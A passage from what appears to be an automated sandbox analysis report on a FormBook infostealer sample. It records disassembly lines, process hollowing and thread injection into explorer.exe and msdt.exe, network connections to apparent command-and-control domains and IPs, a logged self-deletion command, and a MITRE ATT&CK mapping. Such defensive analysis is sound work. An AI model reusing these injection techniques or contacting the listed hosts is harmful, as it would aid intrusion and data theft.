          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D08E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D8FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CEEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CEFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D92073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D02990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D02ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D02AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D64257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D1927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D14A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D14A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D02397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D8D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D03B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D03B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 142.111.47.2 80
          Source: C:\Windows\explorer.exeDomain query: www.yunlimall.com
          Source: C:\Windows\explorer.exeDomain query: www.thriveglucose.com
          Source: C:\Windows\explorer.exeDomain query: www.ololmychartlogin.com
          Source: C:\Windows\explorer.exeNetwork Connect: 13.59.53.244 80
          Source: C:\Windows\explorer.exeNetwork Connect: 54.85.86.211 80
          Source: C:\Windows\explorer.exeDomain query: www.kce0728com.net
          Source: C:\Windows\explorer.exeDomain query: www.cleanxcare.com
          Source: C:\Windows\explorer.exeDomain query: www.ruhexuangou.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.painhut.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeNetwork Connect: 212.32.237.92 80
          Source: C:\Windows\explorer.exeDomain query: www.essentiallyourscandles.com
          Source: C:\Windows\explorer.exeDomain query: www.brunoecatarina.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.82.57.32 80
          Source: C:\Windows\explorer.exeDomain query: www.swayam-moj.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.195.117.147 80
          Source: C:\Windows\explorer.exeNetwork Connect: 78.31.67.91 80
          Source: C:\Windows\explorer.exeDomain query: www.advancedaccessapplications.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: 11E0000
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess created: C:\Users\user\Desktop\DNPr7t0GMY.exe C:\Users\user\Desktop\DNPr7t0GMY.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DNPr7t0GMY.exe'
          Source: explorer.exe, 00000005.00000000.251612925.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.251901669.0000000001980000.00000002.00000001.sdmp, msdt.exe, 0000000A.00000002.480683783.0000000003560000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.233903760.0000000006860000.00000004.00000001.sdmp, msdt.exe, 0000000A.00000002.480683783.0000000003560000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.251901669.0000000001980000.00000002.00000001.sdmp, msdt.exe, 0000000A.00000002.480683783.0000000003560000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.251901669.0000000001980000.00000002.00000001.sdmp, msdt.exe, 0000000A.00000002.480683783.0000000003560000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeQueries volume information: C:\Users\user\Desktop\DNPr7t0GMY.exe VolumeInformation
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.0.DNPr7t0GMY.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.DNPr7t0GMY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.DNPr7t0GMY.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.DNPr7t0GMY.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.0.DNPr7t0GMY.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.DNPr7t0GMY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.DNPr7t0GMY.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.DNPr7t0GMY.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 432808 Sample: DNPr7t0GMY Startdate: 10/06/2021 Architecture: WINDOWS Score: 100 32 www.totally-seo.com 2->32 34 www.boogerstv.com 2->34 36 2 other IPs or domains 2->36 46 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 7 other signatures 2->52 11 DNPr7t0GMY.exe 3 2->11         started        signatures3 process4 file5 30 C:\Users\user\AppData\...\DNPr7t0GMY.exe.log, ASCII 11->30 dropped 62 Tries to detect virtualization through RDTSC time measurements 11->62 15 DNPr7t0GMY.exe 11->15         started        signatures6 process7 signatures8 64 Modifies the context of a thread in another process (thread injection) 15->64 66 Maps a DLL or memory area into another process 15->66 68 Sample uses process hollowing technique 15->68 70 Queues an APC in another process (thread injection) 15->70 18 explorer.exe 15->18 injected process9 dnsIp10 38 cleanxcare.com 78.31.67.91, 49742, 80 MYLOC-ASIPBackboneofmyLocmanagedITAGDE Germany 18->38 40 www.ruhexuangou.com 23.82.57.32, 49752, 80 LEASEWEB-USA-SFO-12US United States 18->40 42 15 other IPs or domains 18->42 54 System process connects to 